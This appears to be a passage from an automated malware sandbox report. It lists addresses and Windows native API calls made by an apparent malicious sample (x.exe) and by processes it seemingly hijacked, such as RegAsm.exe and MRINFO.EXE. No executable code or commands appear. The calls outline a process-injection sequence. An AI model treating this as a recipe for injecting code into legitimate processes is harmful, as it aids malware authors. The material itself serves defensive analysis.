                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62CC0 NtQueryVirtualMemory,5_2_02B62CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62C00 NtQueryInformationProcess,5_2_02B62C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62C60 NtCreateKey,5_2_02B62C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62DB0 NtEnumerateKey,5_2_02B62DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62DD0 NtDelayExecution,5_2_02B62DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62D30 NtUnmapViewOfSection,5_2_02B62D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62D10 NtMapViewOfSection,5_2_02B62D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B63D10 NtOpenProcessToken,5_2_02B63D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62D00 NtSetInformationFile,5_2_02B62D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B63D70 NtOpenThread,5_2_02B63D70
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C4340 NtSetContextThread,LdrInitializeThunk,10_2_037C4340
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C4650 NtSuspendThread,LdrInitializeThunk,10_2_037C4650
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C35C0 NtCreateMutant,LdrInitializeThunk,10_2_037C35C0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2B60 NtClose,LdrInitializeThunk,10_2_037C2B60
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_037C2BF0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_037C2BE0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_037C2BA0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2AF0 NtWriteFile,LdrInitializeThunk,10_2_037C2AF0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2AD0 NtReadFile,LdrInitializeThunk,10_2_037C2AD0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C39B0 NtGetContextThread,LdrInitializeThunk,10_2_037C39B0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2F30 NtCreateSection,LdrInitializeThunk,10_2_037C2F30
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2FE0 NtCreateFile,LdrInitializeThunk,10_2_037C2FE0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2FB0 NtResumeThread,LdrInitializeThunk,10_2_037C2FB0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_037C2EE0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_037C2E80
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_037C2D30
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_037C2D10
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_037C2DF0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2DD0 NtDelayExecution,LdrInitializeThunk,10_2_037C2DD0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_037C2C70
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2C60 NtCreateKey,LdrInitializeThunk,10_2_037C2C60
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_037C2CA0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C3010 NtOpenDirectoryObject,10_2_037C3010
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C3090 NtSetValueKey,10_2_037C3090
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2B80 NtQueryInformationFile,10_2_037C2B80
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2AB0 NtWaitForSingleObject,10_2_037C2AB0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2F60 NtCreateProcessEx,10_2_037C2F60
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2FA0 NtQuerySection,10_2_037C2FA0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2F90 NtProtectVirtualMemory,10_2_037C2F90
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2E30 NtWriteVirtualMemory,10_2_037C2E30
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2EA0 NtAdjustPrivilegesToken,10_2_037C2EA0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C3D70 NtOpenThread,10_2_037C3D70
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C3D10 NtOpenProcessToken,10_2_037C3D10
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2D00 NtSetInformationFile,10_2_037C2D00
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2DB0 NtEnumerateKey,10_2_037C2DB0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2C00 NtQueryInformationProcess,10_2_037C2C00
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2CF0 NtOpenProcess,10_2_037C2CF0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C2CC0 NtQueryVirtualMemory,10_2_037C2CC0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03079790 NtReadFile,10_2_03079790
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03079620 NtCreateFile,10_2_03079620
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03079A80 NtAllocateVirtualMemory,10_2_03079A80
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03079920 NtClose,10_2_03079920
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03079880 NtDeleteFile,10_2_03079880
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0365FA6A NtUnmapViewOfSection,NtClose,10_2_0365FA6A
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_021529003_2_02152900
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02150A7F3_2_02150A7F
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02150A903_2_02150A90
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_021520F13_2_021520F1
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_021521003_2_02152100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418C535_2_00418C53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004010005_2_00401000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040E8175_2_0040E817
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040E8235_2_0040E823
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004031705_2_00403170
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004029305_2_00402930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042F2E35_2_0042F2E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004104A35_2_004104A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416E4E5_2_00416E4E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416E535_2_00416E53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004106C35_2_004106C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040E6D35_2_0040E6D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004046FB5_2_004046FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B352A05_2_02B352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4D2F05_2_02B4D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD12ED5_2_02BD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B2C05_2_02B4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD02745_2_02BD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B7739A5_2_02B7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3E3F05_2_02B3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF03E65_2_02BF03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE132D5_2_02BE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEA3525_2_02BEA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1D34C5_2_02B1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE70E95_2_02BE70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEF0E05_2_02BEF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDF0CC5_2_02BDF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B370C05_2_02B370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3B1B05_2_02B3B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF01AA5_2_02BF01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE81CC5_2_02BE81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCA1185_2_02BCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B201005_2_02B20100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B1F1725_2_02B1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BFB16B5_2_02BFB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B6516C5_2_02B6516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BB81585_2_02BB8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4C6E05_2_02B4C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE16CC5_2_02BE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEF7B05_2_02BEF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2C7C05_2_02B2C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B307705_2_02B30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B547505_2_02B54750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDE4F65_2_02BDE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEF43F5_2_02BEF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B214605_2_02B21460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE24465_2_02BE2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCD5B05_2_02BCD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BF05915_2_02BF0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B305355_2_02B30535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE75715_2_02BE7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BCDAAC5_2_02BCDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B75AA05_2_02B75AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2EA805_2_02B2EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BDDAC65_2_02BDDAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA3A6C5_2_02BA3A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEFA495_2_02BEFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE7A465_2_02BE7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4FB805_2_02B4FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA5BF05_2_02BA5BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B6DBF95_2_02B6DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE6BD75_2_02BE6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEFB765_2_02BEFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEAB405_2_02BEAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B168B85_2_02B168B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B5E8F05_2_02B5E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B338E05_2_02B338E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B9D8005_2_02B9D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B328405_2_02B32840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3A8405_2_02B3A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B329A05_2_02B329A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BFA9A65_2_02BFA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B469625_2_02B46962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B399505_2_02B39950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4B9505_2_02B4B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B39EB05_2_02B39EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B42E905_2_02B42E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BECE935_2_02BECE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEEEDB5_2_02BEEEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEEE265_2_02BEEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30E595_2_02B30E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEFFB15_2_02BEFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B31F925_2_02B31F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B22FC85_2_02B22FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B50F305_2_02B50F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B72F285_2_02B72F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEFF095_2_02BEFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA4F405_2_02BA4F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BD0CB55_2_02BD0CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B20CF25_2_02B20CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BEFCF25_2_02BEFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BA9C325_2_02BA9C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B30C005_2_02B30C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B48DBF5_2_02B48DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B2ADE05_2_02B2ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B4FDC05_2_02B4FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B3AD005_2_02B3AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE7D735_2_02BE7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02BE1D5A5_2_02BE1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B33D405_2_02B33D40
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_0326EA039_2_0326EA03
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_0327702E9_2_0327702E
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_032770339_2_03277033
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_032708A39_2_032708A3
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_0326E8B39_2_0326E8B3
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_032648DB9_2_032648DB
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_032706839_2_03270683
                Source: C:\Program Files (x86)\OVrzdtpAJkUFNFxlpUNgueJzbCMfzzemcypfNUNWleVznMyEoygbG\sxkv2RIDKUVCF4X010eCnC.exeCode function: 9_2_0328F4C39_2_0328F4C3
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0377D34C10_2_0377D34C
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_038503E610_2_038503E6
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379E3F010_2_0379E3F0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384132D10_2_0384132D
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384A35210_2_0384A352
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037D739A10_2_037D739A
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_038312ED10_2_038312ED
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037AD2F010_2_037AD2F0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037AB2C010_2_037AB2C0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037952A010_2_037952A0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0383027410_2_03830274
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0377F17210_2_0377F172
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037C516C10_2_037C516C
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_038501AA10_2_038501AA
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_038481CC10_2_038481CC
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0378010010_2_03780100
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0382A11810_2_0382A118
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379B1B010_2_0379B1B0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0385B16B10_2_0385B16B
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0383F0CC10_2_0383F0CC
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384F0E010_2_0384F0E0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_038470E910_2_038470E9
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037970C010_2_037970C0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379077010_2_03790770
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037B475010_2_037B4750
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384F7B010_2_0384F7B0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0378C7C010_2_0378C7C0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_038416CC10_2_038416CC
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037AC6E010_2_037AC6E0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0385059110_2_03850591
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0382D5B010_2_0382D5B0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379053510_2_03790535
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384757110_2_03847571
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0378146010_2_03781460
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0383E4F610_2_0383E4F6
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384F43F10_2_0384F43F
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384244610_2_03842446
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03846BD710_2_03846BD7
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037CDBF910_2_037CDBF9
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384AB4010_2_0384AB40
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384FB7610_2_0384FB76
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037AFB8010_2_037AFB80
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0382DAAC10_2_0382DAAC
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0383DAC610_2_0383DAC6
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03847A4610_2_03847A46
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384FA4910_2_0384FA49
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037D5AA010_2_037D5AA0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03803A6C10_2_03803A6C
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0378EA8010_2_0378EA80
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037A696210_2_037A6962
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0385A9A610_2_0385A9A6
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379995010_2_03799950
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037AB95010_2_037AB950
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037929A010_2_037929A0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379284010_2_03792840
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379A84010_2_0379A840
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037BE8F010_2_037BE8F0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037938E010_2_037938E0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037768B810_2_037768B8
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384FFB110_2_0384FFB1
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037B0F3010_2_037B0F30
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384FF0910_2_0384FF09
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03782FC810_2_03782FC8
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03804F4010_2_03804F40
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03791F9210_2_03791F92
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384CE9310_2_0384CE93
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03790E5910_2_03790E59
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384EEDB10_2_0384EEDB
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0384EE2610_2_0384EE26
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03799EB010_2_03799EB0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037A2E9010_2_037A2E90
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_03793D4010_2_03793D40
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0379AD0010_2_0379AD00
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_0378ADE010_2_0378ADE0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037AFDC010_2_037AFDC0
                Source: C:\Windows\SysWOW64\MRINFO.EXECode function: 10_2_037A8DBF10_2_037A8DBF
